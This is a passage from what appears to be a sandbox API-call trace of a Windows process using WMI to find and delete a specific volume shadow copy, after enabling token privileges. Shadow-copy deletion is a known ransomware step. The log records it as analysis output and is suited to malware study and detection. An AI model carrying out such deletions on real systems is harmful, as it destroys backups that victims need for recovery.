pType=0x0, plFlavor=0x0) returned 0x0 [0130.903] free (_Block=0x61cae0) [0130.903] lstrlenW (lpString="ms_409") returned 6 [0130.903] malloc (_Size=0xe) returned 0x61cae0 [0130.903] lstrlenW (lpString="ms_409") returned 6 [0130.903] malloc (_Size=0x18) returned 0x61cb80 [0130.903] IWbemClassObject:Get (in: This=0x1e909c0, wszName="User", lFlags=0, pVal=0x26f7c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x44a648, varVal2=0x61cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f7c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x44a648, varVal2=0x61cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0130.903] free (_Block=0x61cb80) [0130.903] malloc (_Size=0x18) returned 0x61cb80 [0130.903] IWbemClassObject:Get (in: This=0x1e909c0, wszName="Password", lFlags=0, pVal=0x26f7c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x44a648, varVal2=0x61cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f7c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x44a648, varVal2=0x61cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0130.903] free (_Block=0x61cb80) [0130.903] malloc (_Size=0x18) returned 0x61cb80 [0130.903] IWbemClassObject:Get (in: This=0x1e909c0, wszName="Server", lFlags=0, pVal=0x26f7c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x44a648, varVal2=0x61cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f7c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x61cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0130.903] free (_Block=0x61cb80) [0130.904] lstrlenW (lpString=".") returned 1 [0130.904] malloc (_Size=0x4) returned 0x617140 [0130.904] lstrlenW (lpString=".") returned 1 [0130.904] malloc (_Size=0x18) returned 0x61cb80 [0130.904] IWbemClassObject:Get (in: This=0x1e909c0, wszName="Authority", lFlags=0, pVal=0x26f7c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x44a648, varVal2=0x61cbe0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f7c0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x44a648, varVal2=0x61cbe0), pType=0x0, plFlavor=0x0) returned 0x0 [0130.904] free (_Block=0x61cb80) [0130.904] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0130.904] IUnknown:Release (This=0x1e909c0) returned 0x1 [0130.904] GetCurrentThreadId () returned 0x5b4 [0130.904] ??0CHString@@QEAA@XZ () returned 0x26f798 [0130.904] malloc (_Size=0x18) returned 0x61cb80 [0130.904] IWbemClassObject:Get (in: This=0x1e904e0, wszName="__RELPATH", lFlags=0, pVal=0x26f7c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x44a648, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x26f7c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0130.904] free (_Block=0x61cb80) [0130.904] malloc (_Size=0x18) returned 0x61cb80 [0130.904] GetCurrentThreadId () returned 0x5b4 [0130.905] ??0CHString@@QEAA@XZ () returned 0x26f618 [0130.905] ??0CHString@@QEAA@PEBG@Z () returned 0x26f630 [0130.905] ??0CHString@@QEAA@AEBV0@@Z () returned 0x26f5c0 [0130.905] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0130.905] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x61d020 [0130.905] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0130.905] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x26f580 [0130.905] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x26f5c8 [0130.905] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x26f630 [0130.905] ??1CHString@@QEAA@XZ () returned 0x5e56c201 [0130.905] ??1CHString@@QEAA@XZ () returned 0x5e56c201 [0130.905] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x26f588 [0130.905] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x26f5c0 [0130.905] ??1CHString@@QEAA@XZ () returned 0x1 [0130.905] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x61d090 [0130.905] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0130.905] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x26f580 [0130.905] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x26f5c8 [0130.905] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x26f630 [0130.905] ??1CHString@@QEAA@XZ () returned 0x5e56c201 [0130.905] ??1CHString@@QEAA@XZ () returned 0x5e56c201 [0130.905] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x26f588 [0130.905] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x26f5c0 [0130.905] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0130.905] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0130.905] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0130.906] malloc (_Size=0x18) returned 0x61cba0 [0130.906] malloc (_Size=0x18) returned 0x61cc00 [0130.906] malloc (_Size=0x18) returned 0x61cc20 [0130.906] malloc (_Size=0x18) returned 0x61cc40 [0130.906] malloc (_Size=0x18) returned 0x61cc60 [0130.906] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0130.906] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0130.906] malloc (_Size=0x18) returned 0x61cc80 [0130.906] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0130.906] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0130.906] malloc (_Size=0x18) returned 0x61cca0 [0130.906] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0130.906] SysStringLen (param_1="\"") returned 0x1 [0130.906] free (_Block=0x61cc80) [0130.906] free (_Block=0x61cc60) [0130.906] free (_Block=0x61cc40) [0130.907] free (_Block=0x61cc20) [0130.907] free (_Block=0x61cc00) [0130.907] free (_Block=0x61cba0) [0130.907] IWbemServices:GetObject (in: This=0x1e83b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x26f608*=0x0, ppCallResult=0x0 | out: ppObject=0x26f608*=0x1e90a50, ppCallResult=0x0) returned 0x0 [0130.908] malloc (_Size=0x18) returned 0x61cba0 [0130.908] IWbemClassObject:Get (in: This=0x1e90a50, wszName="Text", lFlags=0, pVal=0x26f640*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff9e2ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x26f640*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x444aa0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x3ce030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0130.908] free (_Block=0x61cba0) [0130.908] SafeArrayGetLBound (in: psa=0x444aa0, nDim=0x1, plLbound=0x26f620 | out: plLbound=0x26f620) returned 0x0 [0130.908] SafeArrayGetUBound (in: psa=0x444aa0, nDim=0x1, plUbound=0x26f610 | out: plUbound=0x26f610) returned 0x0 [0130.908] SafeArrayGetElement (in: psa=0x444aa0, rgIndices=0x26f604, pv=0x26f658 | out: pv=0x26f658) returned 0x0 [0130.908] malloc (_Size=0x18) returned 0x61cba0 [0130.908] malloc (_Size=0x18) returned 0x61cc00 [0130.908] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0130.908] free (_Block=0x61cba0) [0130.908] IUnknown:Release (This=0x1e90a50) returned 0x0 [0130.908] free (_Block=0x61cca0) [0130.908] ??1CHString@@QEAA@XZ () returned 0x5e56c201 [0130.908] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0130.908] free (_Block=0x61cb80) [0130.909] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0130.909] lstrlenW (lpString="Shadow copy management.") returned 23 [0130.909] malloc (_Size=0x30) returned 0x6185c0 [0130.909] lstrlenW (lpString="Shadow copy management.") returned 23 [0130.909] free (_Block=0x61cc00) [0130.909] IUnknown:Release (This=0x1e904e0) returned 0x0 [0130.909] free (_Block=0x61cbc0) [0130.909] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0130.909] lstrlenW (lpString="PATH") returned 4 [0130.909] lstrlenW (lpString="where") returned 5 [0130.909] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0130.909] lstrlenW (lpString="WHERE") returned 5 [0130.909] lstrlenW (lpString="where") returned 5 [0130.909] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0130.909] lstrlenW (lpString="/") returned 1 [0130.909] lstrlenW (lpString="ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'") returned 43 [0130.909] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'", cchCount1=43, lpString2="/", cchCount2=1) returned 3 [0130.909] lstrlenW (lpString="-") returned 1 [0130.909] lstrlenW (lpString="ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'") returned 43 [0130.909] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'", cchCount1=43, lpString2="-", cchCount2=1) returned 3 [0130.909] lstrlenW (lpString="ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'") returned 43 [0130.909] malloc (_Size=0x58) returned 0x61d020 [0130.909] lstrlenW (lpString="ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'") returned 43 [0130.909] lstrlenW (lpString="/") returned 1 [0130.909] lstrlenW (lpString="delete") returned 6 [0130.910] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0130.910] lstrlenW (lpString="-") returned 1 [0130.910] lstrlenW (lpString="delete") returned 6 [0130.910] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0130.910] lstrlenW (lpString="delete") returned 6 [0130.910] malloc (_Size=0xe) returned 0x61cbc0 [0130.910] lstrlenW (lpString="delete") returned 6 [0130.910] lstrlenW (lpString="GET") returned 3 [0130.910] lstrlenW (lpString="delete") returned 6 [0130.910] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0130.910] lstrlenW (lpString="LIST") returned 4 [0130.910] lstrlenW (lpString="delete") returned 6 [0130.910] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0130.910] lstrlenW (lpString="SET") returned 3 [0130.910] lstrlenW (lpString="delete") returned 6 [0130.910] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0130.910] lstrlenW (lpString="CREATE") returned 6 [0130.910] lstrlenW (lpString="delete") returned 6 [0130.910] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0130.910] lstrlenW (lpString="CALL") returned 4 [0130.910] lstrlenW (lpString="delete") returned 6 [0130.910] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0130.910] lstrlenW (lpString="ASSOC") returned 5 [0130.910] lstrlenW (lpString="delete") returned 6 [0130.910] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0130.910] lstrlenW (lpString="DELETE") returned 6 [0130.910] lstrlenW (lpString="delete") returned 6 [0130.910] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0130.911] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0130.911] malloc (_Size=0x3e) returned 0x61d080 [0130.911] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0130.911] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0130.911] malloc (_Size=0x18) returned 0x61cc00 [0130.911] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0130.911] lstrlenW (lpString="FROM") returned 4 [0130.911] lstrlenW (lpString="*") returned 1 [0130.911] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0130.911] malloc (_Size=0x18) returned 0x61cb80 [0130.911] free (_Block=0x61cc00) [0130.911] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00760009 | out: _String=0x0, _Context=0x3b00760009) returned="from" [0130.911] lstrlenW (lpString="FROM") returned 4 [0130.911] lstrlenW (lpString="from") returned 4 [0130.911] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0130.911] malloc (_Size=0x18) returned 0x61cc00 [0130.911] free (_Block=0x61cb80) [0130.911] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3c00760009 | out: _String=0x0, _Context=0x3c00760009) returned="Win32_ShadowCopy" [0130.911] malloc (_Size=0x18) returned 0x61cb80 [0130.911] free (_Block=0x61cc00) [0130.912] free (_Block=0x61d080) [0130.912] free (_Block=0x61cb80) [0130.912] lstrlenW (lpString="SET") returned 3 [0130.912] lstrlenW (lpString="delete") returned 6 [0130.912] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0130.912] lstrlenW (lpString="CREATE") returned 6 [0130.912] lstrlenW (lpString="delete") returned 6 [0130.912] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0130.912] free (_Block=0x61cef0) [0130.912] malloc (_Size=0x8) returned 0x616f20 [0130.912] lstrlenW (lpString="GET") returned 3 [0130.912] lstrlenW (lpString="delete") returned 6 [0130.912] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0130.912] lstrlenW (lpString="LIST") returned 4 [0130.912] lstrlenW (lpString="delete") returned 6 [0130.912] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0130.912] lstrlenW (lpString="ASSOC") returned 5 [0130.912] lstrlenW (lpString="delete") returned 6 [0130.912] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0130.912] WbemLocator:IUnknown:AddRef (This=0x1e71390) returned 0x3 [0130.912] free (_Block=0xcdfb0) [0130.912] lstrlenW (lpString="") returned 0 [0130.912] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.912] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0130.912] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.912] malloc (_Size=0x14) returned 0x61cb80 [0130.913] lstrlenW (lpString="XDUWTFONO") returned 9 [0130.913] GetCurrentThreadId () returned 0x5b4 [0130.913] GetCurrentProcess () returned 0xffffffffffffffff [0130.913] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x26f9e0 | out: TokenHandle=0x26f9e0*=0x27c) returned 1 [0130.913] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26f9d8 | out: TokenInformation=0x0, ReturnLength=0x26f9d8) returned 0 [0130.913] malloc (_Size=0x118) returned 0x61d080 [0130.913] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x61d080, TokenInformationLength=0x118, ReturnLength=0x26f9d8 | out: TokenInformation=0x61d080, ReturnLength=0x26f9d8) returned 1 [0130.913] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x61d080*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-1084833571, Attributes=0xeac5), (Luid.LowPart=0x0, Luid.HighPart=6409968, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0130.913] free (_Block=0x61d080) [0130.913] CloseHandle (hObject=0x27c) returned 1 [0130.913] lstrlenW (lpString="GET") returned 3 [0130.913] lstrlenW (lpString="delete") returned 6 [0130.913] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0130.913] lstrlenW (lpString="LIST") returned 4 [0130.913] lstrlenW (lpString="delete") returned 6 [0130.913] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0130.913] lstrlenW (lpString="SET") returned 3 [0130.913] lstrlenW (lpString="delete") returned 6 [0130.913] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0130.913] lstrlenW (lpString="CALL") returned 4 [0130.913] lstrlenW (lpString="delete") returned 6 [0130.913] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0130.913] lstrlenW (lpString="ASSOC") returned 5 [0130.914] lstrlenW (lpString="delete") returned 6 [0130.914] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0130.914] lstrlenW (lpString="CREATE") returned 6 [0130.914] lstrlenW (lpString="delete") returned 6 [0130.914] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0130.914] lstrlenW (lpString="DELETE") returned 6 [0130.914] lstrlenW (lpString="delete") returned 6 [0130.914] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0130.914] malloc (_Size=0x18) returned 0x61cc00 [0130.914] lstrlenA (lpString="") returned 0 [0130.914] malloc (_Size=0x2) returned 0xcdfb0 [0130.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff97314c, cbMultiByte=-1, lpWideCharStr=0xcdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0130.914] free (_Block=0xcdfb0) [0130.914] malloc (_Size=0x18) returned 0x61cca0 [0130.914] lstrlenA (lpString="") returned 0 [0130.914] malloc (_Size=0x2) returned 0xcdfb0 [0130.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff97314c, cbMultiByte=-1, lpWideCharStr=0xcdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0130.914] free (_Block=0xcdfb0) [0130.914] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0130.914] malloc (_Size=0x3e) returned 0x61d080 [0130.914] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0130.914] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0130.914] malloc (_Size=0x18) returned 0x61cba0 [0130.915] free (_Block=0x61cca0) [0130.915] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f006e0007 | out: _String=0x0, _Context=0x3f006e0007) returned="*" [0130.915] lstrlenW (lpString="FROM") returned 4 [0130.915] lstrlenW (lpString="*") returned 1 [0130.915] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0130.915] malloc (_Size=0x18) returned 0x61cca0 [0130.915] free (_Block=0x61cba0) [0130.915] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x40006e0007 | out: _String=0x0, _Context=0x40006e0007) returned="from" [0130.915] lstrlenW (lpString="FROM") returned 4 [0130.915] lstrlenW (lpString="from") returned 4 [0130.915] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0130.915] malloc (_Size=0x18) returned 0x61cba0 [0130.917] free (_Block=0x61cca0) [0130.917] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x41006e0007 | out: _String=0x0, _Context=0x41006e0007) returned="Win32_ShadowCopy" [0130.917] malloc (_Size=0x18) returned 0x61cca0 [0130.917] free (_Block=0x61cba0) [0130.917] free (_Block=0x61d080) [0130.917] malloc (_Size=0x18) returned 0x61cba0 [0130.917] malloc (_Size=0x18) returned 0x61cc20 [0130.917] malloc (_Size=0x18) returned 0x61cc40 [0130.917] malloc (_Size=0x18) returned 0x61cc60 [0130.917] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0130.917] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0130.917] malloc (_Size=0x18) returned 0x61cc80 [0130.917] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0130.917] SysStringLen (param_1=" WHERE ") returned 0x7 [0130.917] malloc (_Size=0x18) returned 0x61ccc0 [0130.917] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ") returned 0x25 [0130.917] SysStringLen (param_1="ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'") returned 0x2b [0130.918] free (_Block=0x61cc00) [0130.918] free (_Block=0x61cc80) [0130.918] free (_Block=0x61cc60) [0130.918] free (_Block=0x61cc40) [0130.918] free (_Block=0x61cc20) [0130.918] free (_Block=0x61cba0) [0130.918] ??0CHString@@QEAA@XZ () returned 0x26f950 [0130.918] GetCurrentThreadId () returned 0x5b4 [0130.918] malloc (_Size=0x18) returned 0x61cba0 [0130.918] malloc (_Size=0x18) returned 0x61cc20 [0130.918] malloc (_Size=0x18) returned 0x61cc40 [0130.918] malloc (_Size=0x18) returned 0x61cc60 [0130.918] malloc (_Size=0x18) returned 0x61cc80 [0130.918] SysStringLen (param_1="\\\\") returned 0x2 [0130.918] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0130.918] malloc (_Size=0x18) returned 0x61cc00 [0130.918] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0130.918] SysStringLen (param_1="\\") returned 0x1 [0130.919] malloc (_Size=0x18) returned 0x61cce0 [0130.919] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0130.919] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0130.919] free (_Block=0x61cc00) [0130.919] free (_Block=0x61cc80) [0130.919] free (_Block=0x61cc60) [0130.919] free (_Block=0x61cc40) [0130.919] free (_Block=0x61cc20) [0130.919] free (_Block=0x61cba0) [0130.919] malloc (_Size=0x18) returned 0x61cba0 [0130.919] malloc (_Size=0x18) returned 0x61cc20 [0130.919] malloc (_Size=0x18) returned 0x61cc40 [0130.919] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1e71390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff9e29d0 | out: ppNamespace=0xff9e29d0*=0x1e83c18) returned 0x0 [0130.923] free (_Block=0x61cc40) [0130.923] free (_Block=0x61cc20) [0130.923] free (_Block=0x61cba0) [0130.923] CoSetProxyBlanket (pProxy=0x1e83c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0130.924] free (_Block=0x61cce0) [0130.924] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0130.924] ??0CHString@@QEAA@XZ () returned 0x26f8a0 [0130.924] GetCurrentThreadId () returned 0x5b4 [0130.924] malloc (_Size=0x18) returned 0x61cce0 [0130.924] lstrlenA (lpString="") returned 0 [0130.924] malloc (_Size=0x2) returned 0xcdfb0 [0130.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff97314c, cbMultiByte=-1, lpWideCharStr=0xcdfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0130.924] free (_Block=0xcdfb0) [0130.924] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'") returned 0x50 [0130.924] SysStringLen (param_1="") returned 0x0 [0130.924] free (_Block=0x61cce0) [0130.924] malloc (_Size=0x18) returned 0x61cce0 [0130.924] IWbemServices:ExecQuery (in: This=0x1e83c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'", lFlags=0, pCtx=0x0, ppEnum=0x26f8a8 | out: ppEnum=0x26f8a8*=0x1e83d18) returned 0x0 [0132.204] free (_Block=0x61cce0) [0132.204] CoSetProxyBlanket (pProxy=0x1e83d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0132.207] IEnumWbemClassObject:Next (in: This=0x1e83d18, lTimeout=-1, uCount=0x1, apObjects=0x26f8b0, puReturned=0x26f8c0 | out: apObjects=0x26f8b0*=0x1e83d80, puReturned=0x26f8c0*=0x1) returned 0x0 [0132.208] malloc (_Size=0x18) returned 0x61cce0 [0132.208] IWbemClassObject:Get (in: This=0x1e83d80, wszName="__PATH", lFlags=0, pVal=0x26f8d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x26f8d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{E369493E-E5B4-449B-8539-770BCA375ABB}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0132.208] free (_Block=0x61cce0) [0132.209] malloc (_Size=0x800) returned 0x61d080 [0132.209] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x61d080, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0132.209] FormatMessageW (in: dwFlags=0x2500, lpSource=0x61d080, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x26f7f8, nSize=0x0, 